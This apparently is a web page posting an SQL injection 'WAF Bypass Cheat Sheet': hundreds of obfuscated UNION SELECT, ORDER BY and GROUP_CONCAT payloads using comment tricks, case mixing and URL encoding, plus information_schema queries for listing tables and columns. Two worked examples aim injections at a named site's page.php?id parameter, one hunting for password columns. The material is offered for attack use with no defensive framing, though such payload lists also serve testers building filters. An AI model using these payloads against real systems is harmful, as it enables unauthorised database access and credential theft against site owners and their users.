sqli waf
2019-08-25 03:21:52 -0400
WAF Bypass Cheat Sheet
Union Select
+union+distinct+select+
+union+distinctROW
+select+
/**//*!12345UNION
SELECT*//**/
/**//*!50000UNION
SELECT*//**/
+/*!50000UnIoN*/ /*!
50000SeLeCt aLl*/+
+/*!u%6eion*/+/*!se
%6cect*/+
/**/uniUNIONon/**/
aALLll/**/selSELECTect/
**/
1%')and(0)union(select
(1),version(),3,4,5,6)%
23%23%23
/*!50000%55nIoN*/+/*!
50000%53eLeCt*/
union /*!50000%53elect*/
%55nion %53elect
+--+Union+--+Select+--
+
+UnIoN/*&a=*/SeLeCT/
*&a=*/
id=1+?UnI?On?+'SeL?
ECT?
id=1+'UnI'||'on'+SeLeCT'
UnIoN SeLeCt CoNcAt
(version())--
uNiOn aLl sElEcT
uUNIONnion all
sSELECTelect
/*union*/union/*select*/
select+1,2,3/*
/*uniXon*/union/
*selXect*/select+1,2/*
un/**/ion+sel/**/ect
+
#1q%0Aunion all#qa
%0A#%0Aselect
union /*!select*/+
union/**/select/**/
/**/union/**/select/**/
/**/union/*!
50000select*/
/**//*!12345UNION
SELECT*//**/
/**//*!50000UNION
SELECT*//**/
/**/uniUNIONon/**/
selSELECTect/**/
/**/uniUNIONon/**/
aALLll/**/selSELECTect/
**/
/**//*!union*//**//*!
select*//**/
/**/UNunionION/**/
SELselectECT/**/
/**//*UnIOn*//**//
*SEleCt*//**/
/**//*U*//*n*//*I*//
*O*//*n*//**//*S*//
*E*//*l*//*e*//*C*//
*t*//**/
/**/UNunionION/**/all/
**/SELselectECT/**/
/**//*UnIOn*//**/all/
**//*SEleCt*//**/
/**//*U*//*n*//*I*//
*O*//*n*//**//*all*//
**//*S*//*E*//*l*//
*e*//*C*//*t*//**/
uni
%20union%20/*!select*/
%20
union%23aa%0Aselect
union+distinct+select+
union+distinctROW+select
+
/*!20000%0d%0aunion*/
+/*!20000%0d%0aSel
Ect*/
%252f%252a*/UNION
%252f%252a /SELECT
%252f%252a*/
%23sexsexsex%0AUnIOn
%23sexsexsex%0ASeLecT
+
/*!50000UnIoN*/ /*!
50000SeLeCt aLl*/+
/*!u%6eion*/+/*!se
%6cect*/+
1%?)and(0)union(select
(1),version(),3,4,5,6)%
23%23%23
/*!50000%55nIoN*/+/*!
50000%53eLeCt*/
union /*!50000%53elect*/
+%2F**/+Union/*!
select*/
%55nion %53elect
+?+Union+?+Select+?+
+UnIoN/*&a=*/SeLeCT/
*&a=*/
uNiOn aLl sElEcT
uUNIONnion all
sSELECTelect
union(select(1),2,3)
union (select
1111,2222,3333)
union (/*!/**/ SeleCT */
11)
%0A%09UNION%0CS
ELECT%10NULL%
/*!union*//*?*//*!all*//
*?*//*!select*/
union%23foo*%2F*bar
%0D%0Aselect%23foo%0D
%0A1% 2C2%2C
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa
%0A#%0Aselect
1,2,3,4,5,6,7,8,9,10%0A#a
union(select (1),(2),(3),(4),
(5))
UNION(SELECT(co
lumn)FROM(table))
id=1+?UnI?On?+?SeL?
ECT?
id=1+?UnI?||?on?
+SeLeCT?
union select 1?+%0A,2?+
%0A,3?+%0A etc ?
/*!00000Union*/ /*!
00000Select*/
/*!50000%55nIoN*/ /*!
50000%53eLeCt*/
%55nion %53elect
%55nion(%53elect 1,2,3)--
-
+union+distinct+select+
+union+distinctROW
+select+
/**//*!12345UNION
SELECT*//**/
/**//*!50000UNION
SELECT*//**/
/**/UNION/**//*!
50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+ #?uNiOn + #?sEleCt
+ #?1q %0AuNiOn all#qa
%0A#%0AsEleCt
/*!%55NiOn*/ /*!
%53eLEct*/
/*!u%6eion*/ /*!se
%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**
%2fselect
union%23foo*%2F*bar
%0D%0Aselect%23foo%0D
%0A
REVERSE(noinu)+REVERSE
(tceles)
/*--*/union/*--*/select/
*--*/
union (/*!/**/ SeleCT */
1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/
**/
+%2F**/+Union/*!
select*/
/**//*!union*//**//*!
select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW
+select+
uNiOn aLl sElEcT
UNIunionON+SELs
electECT
/**/union/*!
50000select*//**/
0%a0union%a0select%09
%0Aunion%0Aselect%0A
%55nion/**/%53elect
uni/*!20000%0d%0auni
on*/+/*!20000%0d%0aSel
Ect*/
%252f%252a*/UNION
%252f%252a /SELECT
%252f%252a*/
%0A%09UNION%0CS
ELECT%10NULL%
/*!union*//*--*//*!
all*//*--*//*!select*/
union%23foo*%2F*bar
%0D%0Aselect%23foo%0D
%0A1% 2C2%2C
/*!20000%0d%0aunion*/
+/*!20000%0d%0aSel
Ect*/
+UnIoN/*&a=*/SeLeCT/
*&a=*/
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa
%0A#%0Aselect
union(select (1),(2),(3),(4),
(5))
UNION(SELECT(co
lumn)FROM(table))
%23xyz%0AUnIOn%23xyz
%0ASeLecT+
%23xyz%0A%55nIOn
%23xyz%0A%53eLecT+
union(select(1),2,3)
union (select
1111,2222,3333)
uNioN (/*!/**/ SeleCT */
11)
union (select
1111,2222,3333)
+#1q%0AuNiOn all#qa
%0A#%0AsEleCt
/**//*U*//*n*//*I*//
*o*//*N*//*S*//*e*//
*L*//*e*//*c*//*T*/
%0A/**//*!
50000%55nIOn*//
*yoyu*/all/**/%0A/*!
%53eLEct*/%0A/*nnaa*/
+%23sexsexsex%0AUnIOn
%23sexsexs ex%0ASeLecT
+
+union%23foo*%2F*bar
%0D%0Aselect%23foo%0D
%0A1% 2C2%2C
/*!f****U%0d%0aun
ion*/+/*!f****U%0d
%0aSelEct*/
+%23blobblobblob
%0aUnIOn%23blobblobblob
%0aSeLe cT+
/*!blobblobblob%0d
%0aunion*/+/*!
blobblobblob%0d
%0aSelEct*/
/union\sselect/g
/union\s+select/i
/*!UnIoN*/SeLeCT
+UnIoN/*&a=*/SeLeCT/
*&a=*/
+uni>on+sel>ect+
+(UnIoN)+(SelECT)+
+(UnI)(oN)+(SeL)(EcT)
+?UnI?On?+'SeL?ECT?
+uni on+sel ect+
+/*!UnIoN*/+/*!
SeLeCt*/+
/*!u%6eion*/ /*!se
%6cect*/
uni%20union%20/*!
select*/%20
union%23aa%0Aselect
/**/union/*!
50000select*/
/^.*union.*$/ /
^.*select.*$/
/*union*/union/*select*/
select+
/*uni X on*/union/*sel X
ect*/
+un/**/ion+sel/**/ect+
+UnIOn%0d%0aSeleCt%0d
%0a
UNION/*&test=1*/
SELECT/*&pwn=2*/
un?+un/**/ion+se/**/
lect+
+UNunionION+SEs
electLECT+
+uni%0bon+se%0blect+
%252f%252a*/union%252f
%252a /select%252f%252a
*/
/%2A%2A/union/%2A%2A/
select/%2A%2A/
%2f**%2funion%2f**
%2fselect%2f**%2f
union%23foo*%2F*bar
%0D%0Aselect%23foo%0D
%0A
/*!UnIoN*/SeLecT+
Union Select by PASS with
Url Encoded Method:
%55nion(%53elect)
union%20distinct%20select
union%20%64istinctRO
%57%20select
union%2053elect
%23?%0auion%20?%23?
%0aselect
%23?zen?%0Aunion all
%23zen%0A%23Zen
%0Aselect
%55nion %53eLEct
u%6eion se%6cect
unio%6e %73elect
unio%6e%20%64istinc
%74%20%73elect
uni%6fn distinct%52OW s
%65lect
%75%6e%6f%69%6e
%61%6c%6c %73%65%6c
%65%63%7
Cheat Sheet of Bypassing
Of Order by And Group
By
order by/**_**/
/*!12345order*/ /*!
12345by*/
) order by 1-- -
') order by 1-- -
')order by 1%23%23
%')order by 1%23%23
Null' order by 100--+
Null' order by 9999--+
')group by 99-- -
'group by 119449-- -
'group/**/by/
**/99%23%23
Concat And Group_concat
By Pass cheat Sheet ::
/*!12345group_concat*/
(/*!12345table_name*/)
/*!50000group_concat*/
(/*!50000table_name*/)
/*!GrOuP_ConCaT*/()
/*!12345GroUP_ConCat*/
()
/*!50000gRouP_cOnCaT*/
()
/*!50000Gr%6fuP_c
%6fnCAT*/()
/*!group_concat*/()
gRoUp_cOnCAt()
group_concat(/*!*/)
group_concat(/*!
12345table_name*/)
group_concat(/*!
50000table_name*/)
/*!group_concat*/(/*!
12345table_name*/)
/*!group_concat*/(/*!
50000table_name*/)
unhex(hex(group_concat
(table_name)))
unhex(hex(/*!
group_concat*/(/*!
table_name*/)))
unhex(hex(/*!
12345group_concat*/
(table_name)))
unhex(hex(/*!
12345group_concat*/(/*!
table_name*/)))
unhex(hex(/*!
12345group_concat*/(/*!
12345table_name*/)))
unhex(hex(/*!
50000group_concat*/
(table_name)))
unhex(hex(/*!
50000group_concat*/(/*!
table_name*/)))
unhex(hex(/*!
50000group_concat*/(/*!
50000table_name*/)))
CONVERT(group_concat
(table_name)+USING
+latin1)
CONVERT(group_concat
(table_name)+USING
+latin2)
CONVERT(group_concat
(table_name)+USING
+latin3)
CONVERT(group_concat
(table_name)+USING
+latin4)
CONVERT(group_concat
(table_name)+USING
+latin5)
convert(group_concat
(table_name)+using+ascii)
convert(group_concat(/*!
table_name*/)+using
+ascii)
convert(group_concat(/*!
12345table_name*/
)+using+ascii)
convert(group_concat(/*!
50000table_name*/
)+using+ascii)
/*!concat_ws(0x3a,)*/
concat_ws(0x3a3
a3a,version()
CONCAT_WS(CHAR(
32,58,32),version(),)
How to By Pass Tables:::
group_concat(/*!
table_name*/)
+/*!froM*/ /*!
InfORmaTion_sc
Hema*/.tAblES? -
/*!froM*/ /*!
InfORmaTion_sc
Hema*/.tAblES /*!
WhERe*//*!
TaBle_ScHEmA*/=schEMA
()?
/*!From*/+
%69nformation_schema./
**/tAblES+/*!
50000Where*/+/*!
%54able_ScHEmA*/
=schEMA()? -
How to By Pass Columns:::
group_concat(/*!
column_name*/)
+/*!froM*/
InfORmaTion_scHema.cOlumnS
/*!WheRe*/ /*!
tAblE_naMe*/=hex table
/*!From*/+
%69nformation_schema./
**/columns+/*!
50000Where*/+/*!
%54able_name*/=hex
table/*!froM*/ table? -
URL enCoded By passing
Table and columns::
(select+group_concat(/*!
table_name*/)+/*!From*/
+%69nformation_schema./
**/tAblES+/*!
50000Where*/+/*!
%54able_ScHEmA*/
=schEMA())
(select+group_concat(/*!
column_name*/)+/*!
From*/+%69nformation_s
chema./**/columns+/*!
50000Where*/+/*!
%54able_name*/=hex
table)
like
http://www.marinaplast.
com/page.php?id=-13
union select 1,2,(select
+group_concat(/*!
table_name*/)+/*!From*/
+%69nformation_schema./
**/tAblES+/*!
50000Where*/+/*!
%54able_ScHEmA*/
=schEMA()),4,5 ?
illegal mix of Collations
ByPass ::
unhex(hex(Concat
(Column_Name,0
x3e,Table_schem
a,0x3e,table_Name)))
/*!from*/
information_sche
ma.columns/*!where*/
column_name%20/*!like*/
char(37,%20112,%2097,
%20115,%20115,%2037)
http://www.marinaplast.
com/page.php?id=-13
union select 1,2,unhex(hex
(Concat(Column_Na
me,0x3e,Table_s
chema,0x3e,tabl
e_Name))),4,5 /*!from*/
information_sche
ma.columns/*!where*/
column_name%20/*!like*/
char(37,%20112,%2097,
%20115,%20115,%2037)?
Back to home
Subscribe |
Register |
Login
| N